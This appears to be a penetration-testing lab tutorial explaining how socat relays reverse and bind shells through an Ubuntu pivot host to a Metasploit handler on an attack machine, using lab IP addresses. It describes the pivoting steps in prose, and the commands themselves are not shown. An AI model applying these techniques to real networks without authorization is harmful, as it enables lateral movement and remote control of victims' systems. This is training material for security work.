Playing Pong with Socat
Socat Redirection with a Reverse Shell
Socat is a bidirectional relay tool that can create pipe sockets between 2 independent network channels without needing to use SSH tunneling.
We can start Metasploit's listener using the same command mentioned in the last section on our attack host, and we can start socat on the Ubuntu server.
Socat will listen on localhost on port 8080 and forward all the traffic to port 80 on our attack host (10.10.14.18).
We then create a payload for the Windows target that points at the Ubuntu server running socat and start our multi_handler on the attack machine
(we need port 80)
We can test this by running our payload on the windows host again, and we should see a network connection from the Ubuntu server this time.
Socat Redirection with a Bind Shell
Similar to our socat's reverse shell redirector, we can also create a socat bind shell redirector. This is different from reverse shells that connect back from the Windows server to the Ubuntu server and get redirected to our attack host.
In the case of bind shells, the Windows server will start a listener and bind to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.
At the same time, we can create a socat redirector on the Ubuntu server, which will listen for incoming connections from a Metasploit bind handler and forward that to a bind shell payload on a Windows target. The below figure should explain the pivot in a much better way.
Creating the Windows Payload
We can start a socat bind shell listener, which listens on port 8080 and forwards packets to Windows server 8443.
172.16.5.19 is the Windows IP
Establishing Meterpreter Session
Last updated
